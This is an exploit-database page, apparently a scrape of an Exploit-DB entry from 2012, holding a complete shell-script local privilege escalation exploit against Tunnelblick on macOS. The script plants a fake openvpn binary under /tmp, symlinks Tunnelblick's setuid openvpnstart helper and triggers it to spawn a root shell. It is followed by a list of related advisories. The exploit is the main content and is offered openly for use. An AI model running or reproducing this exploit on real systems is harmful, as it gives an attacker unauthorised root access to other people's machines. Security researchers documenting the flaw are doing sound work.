Lucene search
Zx2c4EDB-ID:20443HistoryAug 11, 2012 - 12:00 a.m.
Tunnelblick - Local Privilege Escalation (2)
2012-08-1100:00:00
zx2c4
www.exploit-db.com
19
#!/bin/sh
#### Pwnnel Blicker ####
# for kids #
# #
# zx2c4 #
# #
########################
# This is another exploit for Tunnel Blick.
# Other exploits for Tunnel Blick are available here:
# http://git.zx2c4.com/Pwnnel-Blicker/tree/
echo "[+] Making vulnerable directory."
mkdir -pv /tmp/pwn/openvpn/openvpn-0
echo "[+] Preparing payload."
cat > /tmp/pwn/openvpn/openvpn-0/openvpn <<_EOF
#!/bin/sh
echo "[+] Cleaning up."
rm -rfv /tmp/pwn
echo "[+] Getting root."
exec bash
_EOF
chmod -v +x /tmp/pwn/openvpn/openvpn-0/openvpn
echo "[+] Creating symlink."
ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
echo "[+] Triggering vulnerable program."
exec /tmp/pwn/start OpenVPNInfo 0Related
d2
d2
DSquare Exploit Pack: D2SEC_TUNNELBLICK
2012-08-26 19:55:00
cvelist
cvelist
exploitdb
exploitdb
Tunnelblick - Local Privilege Escalation (1)
2012-08-11 00:00:00
Tunnelblick - Setuid Privilege Escalation (Metasploit)
2013-03-05 00:00:00
metasploit
metasploit
Setuid Tunnelblick Privilege Escalation
2013-03-03 18:48:12
cve
cve
prion
prion
Race condition
2012-08-26 19:55:00
Code injection
2012-08-26 19:55:00
Hardcoded credentials
2012-08-26 19:55:00
nvd
nvd
zdt
zdt
Setuid Tunnelblick Privilege Escalation Vulnerability
2013-03-05 00:00:00
packetstorm
packetstorm
Setuid Tunnelblick Privilege Escalation
2013-03-05 00:00:00